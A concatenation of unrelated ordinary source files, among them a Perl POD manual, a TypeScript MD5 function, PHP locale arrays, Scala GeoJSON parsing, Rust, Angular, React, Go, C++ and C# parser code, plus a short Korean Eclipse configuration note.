Specify the optional path to store the SQLite database file. The default
path is the C<~/lib>.
=item --table [refGene|ensGene|knownGene|xenoRefGene|all]
Provide one or more UCSC tables to load into the database. They may be
specified as comma-delimited list (no spaces) or as separate, repeated
arguments. The default is refGene, ensGene, and knownGene (if available).
=item --keep
Keep the downloaded UCSC tables and converted GFF3 files. Default is to
delete them.
=item --verbose
Show realtime database loading progress.
=item --version
Print the version number.
=item --help
Display this POD documentation.
=back
=head1 DESCRIPTION
This program will simplify the task of generating an annotation database. You
provide the short name of the UCSC database for the species and genome version
you are interested in, and the script will automatically download gene annotation
and build a I<Bio::DB::SeqFeature::Store> database for use with BioToolBox
scripts.
=head1 AUTHOR
Timothy J. Parnell, PhD
Dept of Oncological Sciences
Huntsman Cancer Institute
University of Utah
Salt Lake City, UT, 84112
This package is free software; you can redistribute it and/or modify
it under the terms of the Artistic License 2.0.
|
import { bytesToHex, bytesToWords, endian, Md5Sha1Options, wordsToBytes } from "./crypt";
import { bin, utf8 } from "../charenc";
declare const Buffer;
function FF(a, b, c, d, x, s, t) {
const n = a + (b & c | ~b & d) + (x >>> 0) + t;
return ((n << s) | (n >>> (32 - s))) + b;
}
function GG(a, b, c, d, x, s, t) {
const n = a + (b & d | c & ~d) + (x >>> 0) + t;
return ((n << s) | (n >>> (32 - s))) + b;
}
function HH(a, b, c, d, x, s, t) {
const n = a + (b ^ c ^ d) + (x >>> 0) + t;
return ((n << s) | (n >>> (32 - s))) + b;
}
function II(a, b, c, d, x, s, t) {
const n = a + (c ^ (b | ~d)) + (x >>> 0) + t;
return ((n << s) | (n >>> (32 - s))) + b;
}
function _md5(message, options: Md5Sha1Options) {
let i;
// Convert to byte array
if (message.constructor == String)
if (options && options.encoding === 'binary')
message = bin.stringToBytes(message);
else
message = utf8.stringToBytes(message);
else if (typeof Buffer !== 'undefined' && typeof Buffer.isBuffer == 'function' && Buffer.isBuffer(message))
message = Array.prototype.slice.call(message, 0);
else if (!Array.isArray(message))
message = message.toString();
// else, assume byte array already
const m = bytesToWords(message),
l = message.length * 8;
let a = 1732584193,
b = -271733879,
c = -1732584194,
d = 271733878;
// Swap endian
for (i = 0; i < m.length; i++) {
m[i] = ((m[i] << 8) | (m[i] >>> 24)) & 0x00FF00FF |
((m[i] << 24) | (m[i] >>> 8)) & 0xFF00FF00;
}
// Padding
m[l >>> 5] |= 0x80 << (l % 32);
m[(((l + 64) >>> 9) << 4) + 14] = l;
for (i = 0; i < m.length; i += 16) {
const aa = a, bb = b, cc = c, dd = d;
a = FF(a, b, c, d, m[i + 0], 7, -680876936);
d = FF(d, a, b, c, m[i + 1], 12, -389564586);
c = FF(c, d, a, b, m[i + 2], 17, 606105819);
b = FF(b, c, d, a, m[i + 3], 22, -1044525330);
a = FF(a, b, c, d, m[i + 4], 7, -176418897);
d = FF(d, a, b, c, m[i + 5], 12, 1200080426);
c = FF(c, d, a, b, m[i + 6], 17, -1473231341);
b = FF(b, c, d, a, m[i + 7], 22, -45705983);
a = FF(a, b, c, d, m[i + 8], 7, 1770035416);
d = FF(d, a, b, c, m[i + 9], 12, -1958414417);
c = FF(c, d, a, b, m[i + 10], 17, -42063);
b = FF(b, c, d, a, m[i + 11], 22, -1990404162);
a = FF(a, b, c, d, m[i + 12], 7, 1804603682);
d = FF(d, a, b, c, m[i + 13], 12, -40341101);
c = FF(c, d, a, b, m[i + 14], 17, -1502002290);
b = FF(b, c, d, a, m[i + 15], 22, 1236535329);
a = GG(a, b, c, d, m[i + 1], 5, -165796510);
d = GG(d, a, b, c, m[i + 6], 9, -1069501632);
c = GG(c, d, a, b, m[i + 11], 14, 643717713);
b = GG(b, c, d, a, m[i + 0], 20, -373897302);
a = GG(a, b, c, d, m[i + 5], 5, -701558691);
d = GG(d, a, b, c, m[i + 10], 9, 38016083);
c = GG(c, d, a, b, m[i + 15], 14, -660478335);
b = GG(b, c, d, a, m[i + 4], 20, -405537848);
a = GG(a, b, c, d, m[i + 9], 5, 568446438);
d = GG(d, a, b, c, m[i + 14], 9, -1019803690);
c = GG(c, d, a, b, m[i + 3], 14, -187363961);
b = GG(b, c, d, a, m[i + 8], 20, 1163531501);
a = GG(a, b, c, d, m[i + 13], 5, -1444681467);
d = GG(d, a, b, c, m[i + 2], 9, -51403784);
c = GG(c, d, a, b, m[i + 7], 14, 1735328473);
b = GG(b, c, d, a, m[i + 12], 20, -1926607734);
a = HH(a, b, c, d, m[i + 5], 4, -378558);
d = HH(d, a, b, c, m[i + 8], 11, -2022574463);
c = HH(c, d, a, b, m[i + 11], 16, 1839030562);
b = HH(b, c, d, a, m[i + 14], 23, -35309556);
a = HH(a, b, c, d, m[i + 1], 4, -1530992060);
d = HH(d, a, b, c, m[i + 4], 11, 1272893353);
c = HH(c, d, a, b, m[i + 7], 16, -155497632);
b = HH(b, c, d, a, m[i + 10], 23, -1094730640);
a = HH(a, b, c, d, m[i + 13], 4, 681279174);
d = HH(d, a, b, c, m[i + 0], 11, -358537222);
c = HH(c, d, a, b, m[i + 3], 16, -722521979);
b = HH(b, c, d, a, m[i + 6], 23, 76029189);
a = HH(a, b, c, d, m[i + 9], 4, -640364487);
d = HH(d, a, b, c, m[i + 12], 11, -421815835);
c = HH(c, d, a, b, m[i + 15], 16, 530742520);
b = HH(b, c, d, a, m[i + 2], 23, -995338651);
a = II(a, b, c, d, m[i + 0], 6, -198630844);
d = II(d, a, b, c, m[i + 7], 10, 1126891415);
c = II(c, d, a, b, m[i + 14], 15, -1416354905);
b = II(b, c, d, a, m[i + 5], 21, -57434055);
a = II(a, b, c, d, m[i + 12], 6, 1700485571);
d = II(d, a, b, c, m[i + 3], 10, -1894986606);
c = II(c, d, a, b, m[i + 10], 15, -1051523);
b = II(b, c, d, a, m[i + 1], 21, -2054922799);
a = II(a, b, c, d, m[i + 8], 6, 1873313359);
d = II(d, a, b, c, m[i + 15], 10, -30611744);
c = II(c, d, a, b, m[i + 6], 15, -1560198380);
b = II(b, c, d, a, m[i + 13], 21, 1309151649);
a = II(a, b, c, d, m[i + 4], 6, -145523070);
d = II(d, a, b, c, m[i + 11], 10, -1120210379);
c = II(c, d, a, b, m[i + 2], 15, 718787259);
b = II(b, c, d, a, m[i + 9], 21, -343485551);
a = (a + aa) >>> 0;
b = (b + bb) >>> 0;
c = (c + cc) >>> 0;
d = (d + dd) >>> 0;
}
return endian([a, b, c, d]);
}
export function md5(content: string | number): string {
return bytesToHex(wordsToBytes(_md5(content + "", undefined)));
}
|
<?
$MESS["T_IBLOCK_NAME_BLOCK"] = "Jobs Block Title";
$MESS["T_IBLOCK_DESC_NAME_BLOCK"] = "Vacancies";
?>
|
/*
* This software is licensed under the Apache 2 license, quoted below.
*
* Copyright 2019 Astraea, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* [http://www.apache.org/licenses/LICENSE-2.0]
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
* SPDX-License-Identifier: Apache-2.0
*
*/
package org.locationtech.rasterframes.datasource.geojson
import geotrellis.vector.Extent
import org.locationtech.jts.geom.{Envelope, Geometry}
import org.locationtech.jts.io.geojson.{GeoJsonReader, GeoJsonWriter}
import spray.json.DefaultJsonProtocol._
import spray.json._
/**
* Lightweight DOM for parsing GeoJSON feature sets.
*
* @since 7/17/18
*/
object DOM {
implicit val envelopeFormat: RootJsonFormat[Envelope] = new RootJsonFormat[Envelope] {
override def read(json: JsValue): Envelope = json match {
case JsArray(Vector(JsNumber(west), JsNumber(south), JsNumber(east), JsNumber(north))) =>
new Envelope(west.toDouble, east.toDouble, south.toDouble, north.toDouble)
case JsArray(
Vector(JsNumber(west), JsNumber(south), _, JsNumber(east), JsNumber(north), _)) =>
new Envelope(west.toDouble, east.toDouble, south.toDouble, north.toDouble)
case x => deserializationError("Expected Array as JsArray, but got " + x)
}
override def write(obj: Envelope): JsValue =
JsArray(
Vector(
JsNumber(obj.getMinX),
JsNumber(obj.getMinY),
JsNumber(obj.getMaxX),
JsNumber(obj.getMaxY)
)
)
}
implicit val extentFormat: RootJsonFormat[Extent] = new RootJsonFormat[Extent] {
override def read(json: JsValue): Extent = json match {
case JsArray(Vector(JsNumber(west), JsNumber(south), JsNumber(east), JsNumber(north))) =>
Extent(west.toDouble, south.toDouble, east.toDouble, north.toDouble)
case JsArray(
Vector(JsNumber(west), JsNumber(south), _, JsNumber(east), JsNumber(north), _)) =>
Extent(west.toDouble, south.toDouble, east.toDouble, north.toDouble)
case x => deserializationError("Expected Array as JsArray, but got " + x)
}
override def write(obj: Extent): JsValue =
JsArray(
Vector(
JsNumber(obj.xmin),
JsNumber(obj.ymin),
JsNumber(obj.xmax),
JsNumber(obj.ymax)
)
)
}
case class GeoJsonFeatureSet(features: Seq[GeoJsonFeature])
object GeoJsonFeatureSet {
implicit val domFormat: RootJsonFormat[GeoJsonFeatureSet] = jsonFormat1(GeoJsonFeatureSet.apply)
}
case class GeoJsonFeature(
geometry: Geometry,
bbox: Option[Extent],
properties: Map[String, JsValue])
object GeoJsonFeature {
implicit val featureFormat: RootJsonFormat[GeoJsonFeature] = jsonFormat3(GeoJsonFeature.apply)
}
implicit val geomFormat: RootJsonFormat[Geometry] = new RootJsonFormat[Geometry] {
def read(json: JsValue): Geometry = {
val reader = new GeoJsonReader()
reader.read(json.compactPrint)
}
def write(obj: Geometry): JsValue = {
val writer = new GeoJsonWriter()
writer.write(obj).parseJson
}
}
}
|
#[derive(Debug)]
struct Node<'a> {
children: Vec<Node<'a>>,
metadata: &'a [i32],
len: usize,
}
impl Node<'_> {
fn checksum(&self) -> i32 {
self.metadata.iter().sum::<i32>() + self.children.iter().map(|x| x.checksum()).sum::<i32>()
}
fn value(&self) -> i32 {
if self.children.is_empty() {
self.metadata.iter().sum()
} else {
self.metadata.iter().fold(0, |a, b| {
let added_value = self
.children
.get((b - 1) as usize)
.map(|x| x.value())
.unwrap_or(0);
a + added_value
})
}
}
fn len(&self) -> usize {
self.len
}
}
struct Header {
children: usize,
metadata: usize,
}
impl Header {
fn extract(license: &[i32]) -> Result<Header, NodeError> {
Ok(Header {
children: *license.get(0).ok_or(NodeError::Header)? as usize,
metadata: *license.get(1).ok_or(NodeError::Header)? as usize,
})
}
}
#[derive(Debug)]
enum NodeError {
Header,
Body,
}
fn main() -> Result<(), NodeError> {
let license = license_values();
let tree = build_tree(&license)?;
println!("{}", tree.checksum());
println!("{}", tree.value());
Ok(())
}
fn build_tree(license: &[i32]) -> Result<Node, NodeError> {
// Offset is initialized to the width of the header.
let mut offset = 2;
let mut children = Vec::new();
let header = Header::extract(license)?;
for _ in 0..header.children {
let child = build_tree(&license[offset..])?;
offset += child.len();
children.push(child);
}
// Hopefully this just never happens...
let metadata = &license[offset..(offset + (header.metadata as usize))];
if metadata.len() != header.metadata {
return Err(NodeError::Body);
}
Ok(Node {
children,
metadata,
len: offset + header.metadata,
})
}
fn license_values() -> Vec<i32> {
static INPUT: &str = include_str!("../input.txt");
fn parse_int(s: &str) -> Option<i32> {
s.parse().ok()
}
INPUT.split_whitespace().filter_map(parse_int).collect()
}
|
import { Component, OnInit } from '@angular/core';
import { Validators, FormBuilder, FormGroup } from '@angular/forms';
import { ActivatedRoute, Router } from '@angular/router';
import { TicketsService } from '../tickets.service';
import { ToasterService } from 'angular2-toaster';
import { ValidationService } from '../../common/utils/validation.service';
@Component({
selector: 'app-ticket-update',
templateUrl: './ticket-update.component.html',
styleUrls: ['./ticket-update.component.css']
})
export class TicketUpdateComponent implements OnInit {
ticketID = null ;
file = null;
ticketUpdateForm: FormGroup;
submitted = false;
constructor(private formBuilder: FormBuilder,
private route: ActivatedRoute,
private ticketService: TicketsService,
private toasterService: ToasterService,
private validationService: ValidationService,
private router: Router) { }
ngOnInit() {
this.ticketID = this.route.snapshot.paramMap.get('id');
this.ticketService.getTicketById(this.ticketID).subscribe(
(bodyResponse) => { this.loadTicketData(bodyResponse); }
);
this.ticketUpdateForm = this.formBuilder.group({
objet: ['', Validators.required],
element: ['', Validators.required],
nom: ['', Validators.required],
etat: [{value: '', disabled: true}, Validators.required],
date_d_ouverture: ['', Validators.required],
date_d_echeance: ['', Validators.required],
categorie: ['', Validators.required],
impact: ['', Validators.required],
lieu: ['', Validators.required],
commentaire: ['', ],
num_agence: ['', ],
departement: ['', ],
description: ['', Validators.required]
});
}
loadTicketData(bodyResponse) {
const data = bodyResponse.data;
this.ticketUpdateForm.patchValue(data);
}
changeSelectedFile(files) {
if (files.length === 0) {
return;
}
this.file = files[0];
}
// convenience getter for easy access to form fields
get f() { return this.ticketUpdateForm.controls; }
// on submit
onSubmit() {
this.submitted = true;
// stop here if form is invalid
if (this.ticketUpdateForm.invalid) {
return;
}
// Create a request body data
const requestBody = new FormData();
requestBody.append('_method', 'put');
requestBody.append('objet', this.ticketUpdateForm.get('objet').value);
requestBody.append('nom', this.ticketUpdateForm.get('nom').value);
requestBody.append('element', this.ticketUpdateForm.get('element').value);
requestBody.append('etat', this.ticketUpdateForm.get('etat').value);
requestBody.append('date_d_ouverture', this.ticketUpdateForm.get('date_d_ouverture').value);
requestBody.append('date_d_echeance', this.ticketUpdateForm.get('date_d_echeance').value);
requestBody.append('categorie', this.ticketUpdateForm.get('categorie').value);
requestBody.append('num_agence', this.ticketUpdateForm.get('num_agence').value);
requestBody.append('departement', this.ticketUpdateForm.get('departement').value);
requestBody.append('impact', this.ticketUpdateForm.get('impact').value);
requestBody.append('lieu', this.ticketUpdateForm.get('lieu').value);
requestBody.append('commentaire', this.ticketUpdateForm.get('commentaire').value);
requestBody.append('description', this.ticketUpdateForm.get('description').value);
if (this.file !== undefined && this.file !== null) {
requestBody.append('file', this.file, this.file.name);
}
this.ticketService.updateTicket(this.ticketID, requestBody).subscribe(
(bodyResponse) => { this.processResponse(bodyResponse); },
(error) => { this.validationService.showValidationsMessagesInToast(error); }
);
}
processResponse(bodyResponse) {
this.toasterService.pop('success', 'Ticket modifiée:', bodyResponse.message);
this.router.navigate(['/home/tickets/index']);
}
}
|
<?php
return [
'same_as_above'=>'Same as Above'
];
|
import React from "react";
export default () => (
<div className="w-100">
<h2 className="mb-3">EDUCACIÓN</h2>
<div className="resume-item d-flex flex-column flex-md-row justify-content-between">
<div className="resume-content">
<h3 className="mb-0 h5">Maestría en Gestión de Tecnologías de la información.</h3>
<div className="mb-3">
Universidad Tecmilenio. <span className="text-primary">Titulado</span>
</div>
</div>
<div className="resume-date text-md-right">
<span className="text-primary">Diciembre de 2016 - Diciembre de 2018.</span>
</div>
</div>
<div className="resume-item d-flex flex-column flex-md-row justify-content-between">
<div className="resume-content">
<h3 className="mb-0 h5">Ingeniería en Tecnologías de la Información</h3>
<div className="mb-3">
Universidad Tecnológica de Puebla. <span className="text-primary">Titulado</span>
</div>
</div>
<div className="resume-date text-md-right">
<span className="text-primary">Septiembre de 2009 - Julio de 2015.</span>
</div>
</div>
<div className="resume-item d-flex flex-column flex-md-row justify-content-between">
<div className="resume-content">
<h3 className="mb-0 h5">TSU en Informática, especialidad en programación</h3>
<div className="mb-3">
Universidad Tecnológica de Puebla. <span className="text-primary">Titulado</span>
</div>
</div>
<div className="resume-date text-md-right">
<span className="text-primary"> Julio de 2003 - Septiembre de 2005.</span>
</div>
</div>
</div>
)
|
import { Engine } from '@xrengine/engine/src/ecs/classes/Engine'
import {
Scene,
AmbientLight,
DirectionalLight,
PerspectiveCamera,
Box3,
Vector3,
MeshStandardMaterial,
Mesh,
WebGLRenderer
} from 'three'
import { traverseMaterials } from '../functions/materials'
import { getCanvasBlob } from '../functions/thumbnails'
import makeRenderer from './makeRenderer'
export default class ThumbnailRenderer {
static instance: ThumbnailRenderer
renderer: WebGLRenderer
constructor() {
this.renderer = makeRenderer(512, 512)
}
generateThumbnail = async (object: Mesh, width = 256, height = 256) => {
const scene = new Scene()
const camera = new PerspectiveCamera()
const light1 = new AmbientLight(0xffffff, 0.3)
const light2 = new DirectionalLight(0xffffff, 0.8 * Math.PI)
light2.position.set(0.5, 0, 0.866)
scene.add(object)
scene.add(light1)
scene.add(light2)
scene.add(camera)
traverseMaterials(object, (material: MeshStandardMaterial) => {
if (material.isMeshStandardMaterial || (material as any).isGLTFSpecularGlossinessMaterial) {
material.envMap = Engine.scene.environment
material.needsUpdate = true
}
})
object.updateMatrixWorld()
const box = new Box3().setFromObject(object)
const size = box.getSize(new Vector3()).length()
const center = box.getCenter(new Vector3())
camera.near = size / 100
camera.far = size * 100
camera.aspect = width / height
camera.updateProjectionMatrix()
camera.position.copy(center)
camera.position.x += size
camera.position.y += size / 2
camera.position.z += size
camera.lookAt(center)
camera.layers.disable(1)
this.renderer.setSize(width, height, true)
this.renderer.render(scene, camera)
return getCanvasBlob(this.renderer.domElement)
}
}
|
---
title: cross_zone_move_instance_by_group_id
searchTitle: Lua EQ cross_zone_move_instance_by_group_id
weight: 1
hidden: true
menuTitle: cross_zone_move_instance_by_group_id
---
## cross_zone_move_instance_by_group_id
```lua
eq.cross_zone_move_instance_by_group_id(number group_id, uint16 instance_id) -- void
```
|
package solution
import (
"sort"
"strconv"
)
func findRelativeRanks(nums []int) []string {
rsu := []string{"Gold Medal", "Silver Medal", "Bronze Medal"}
switch len(nums) {
case 0:
return []string{}
case 1:
return rsu[:1]
case 2:
return rsu[:2]
case 3:
return rsu[:3]
}
sort.Slice(nums, func(i, j int) bool {
return nums[i] < nums[j]
})
for i := 3; i < len(nums); i++ {
rsu = append(rsu, strconv.Itoa(nums[i]))
}
return rsu
}
|
#include <chrono>
#include <random>
#include "maze/utils.h"
namespace utils {
int random_integer(int lower, int upper) {
auto seed = std::chrono::system_clock::now().time_since_epoch().count();
std::default_random_engine generator(seed);
std::uniform_int_distribution<int> distribution(lower, upper);
return distribution(generator);
}
}
|
<?php
/**
* Created by PhpStorm.
* User: LEM
* Date: 05/01/2016
* Time: 15:11
*/
return [
'tag' => 'Mots Clés: ',
'noTag' => 'Aucun mot clé:',
'category' => 'Catégorie: ',
'noCategory' => 'Pas de catégorie',
'emailAdress' => 'Adresse mail',
'emailContent' => 'Votre message',
'password' => 'Mot de passe',
'remember' => 'Se souvenir',
'contactSuccess' => 'Votre message a été envoyé avec succès',
'home' => 'Acceuil',
'price' => 'Prix: ',
'dateCreate' => 'Créé le: ',
'score' => 'Nombre de ventes: ',
'backHome' => 'Home',
'dashboard' => 'Dashboard',
'history' => 'History',
'logout' => 'logout',
'login' => 'login',
'admin' => 'admin',
'noAuth' => 'login ou mot de passe incorrect',
];
|
---
toc: true
title: " Eclipse 관련 모음"
description: "Eclipse 관련 모음"
categories: [Eclipse]
tags: [Eclipse]
redirect_from:
- /2019/05/31/
---
> Eclipse 관련 모음
### Eclipse JVM 경로 설정 -vm 옵션 in eclipse.ini file {#toc1}
```md
반드시 실행파일명을 포함한 전체경로를 적어야 한다.
-product, --launcher.* 가 있는 라인 이후, -vmargs 라인의 이전에 기입
--launcher.defaultAction
openFile
-vm
D:\JAVA\bin\javaw.exe
-vmargs
-Dosgi.requiredJavaVersion=1.7
```
[^1]: This is a footnote.
[kramdown]: https://kramdown.gettalong.org/
[My Blog]: https://marindie.github.io
|
using System.Globalization;
using sly.lexer;
using sly.parser.generator;
namespace ParserTests.Issue259
{
public class Issue259Parser
{
[Operand]
[Production("logical_literal: OFF")]
[Production("logical_literal: ON")]
public string LiteralBool(Token<Issue259ExpressionToken> token)
{
return token.Value;
}
[Operand]
[Production("primary: HEX_NUMBER")]
public string NumericExpressionFromLiteralNumber(Token<Issue259ExpressionToken> offsetToken)
{
return offsetToken.Value;
}
[Operand]
[Production("primary: DECIMAL_NUMBER")]
public string NumericExpressionFromDecimalNumber(Token<Issue259ExpressionToken> offsetToken)
{
var text = offsetToken.Value;
var value = double.Parse(text, CultureInfo.InvariantCulture);
return value.ToString(CultureInfo.InvariantCulture);
}
[Infix((int)Issue259ExpressionToken.PLUS, Associativity.Left, 14)]
[Infix((int)Issue259ExpressionToken.MINUS, Associativity.Left, 14)]
[Infix((int)Issue259ExpressionToken.TIMES, Associativity.Left, 15)]
[Infix((int)Issue259ExpressionToken.DIVIDE, Associativity.Left, 15)]
[Infix((int)Issue259ExpressionToken.BITWISE_AND, Associativity.Left, 10)]
[Infix((int)Issue259ExpressionToken.BITWISE_OR, Associativity.Left, 8)]
public string NumberExpression(string lhs, Token<Issue259ExpressionToken> token, string rhs)
{
return $"({lhs} {token.Value} {rhs})";
}
[Infix((int)Issue259ExpressionToken.LOGICAL_AND, Associativity.Left, 7)]
[Infix((int)Issue259ExpressionToken.LOGICAL_OR, Associativity.Left, 6)]
public string LogicalExpression(string lhs, Token<Issue259ExpressionToken> token, string rhs)
{
return $"({lhs} {token.Value} {rhs})";
}
[Prefix((int)Issue259ExpressionToken.MINUS, Associativity.Right, 17)]
public string NumericExpression(Token<Issue259ExpressionToken> _, string child)
{
return $"-{child}";
}
// We want NOT to to bind tighter than AND/OR but looser than numeric comparison operations
[Prefix((int)Issue259ExpressionToken.NOT, Associativity.Right, 11)]
public string LogicalExpression(Token<Issue259ExpressionToken> _, string child)
{
return $"(NOT {child})";
}
[Infix((int)Issue259ExpressionToken.COMPARISON, Associativity.Left, 12)]
public string Comparison(string lhs, Token<Issue259ExpressionToken> token, string rhs)
{
return $"({lhs} {token.Value} {rhs})";
}
[Operand]
[Production("numeric_literal: LVAR")]
public string Lvar(Token<Issue259ExpressionToken> token)
{
return token.Value;
}
[Operand]
[Production("numeric_literal: SIMVAR")]
public string SimVarExpression(Token<Issue259ExpressionToken> simvarToken)
{
var text = simvarToken.Value[2..];
var bits = text.Split(",");
var varName = bits[0];
var type = bits[1].Trim();
return $"A:{varName}, {type}";
}
[Operand]
[Production("group : LPAREN Issue259Parser_expressions RPAREN")]
public string Group(Token<Issue259ExpressionToken> _1, string child, Token<Issue259ExpressionToken> _2)
{
return child;
}
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.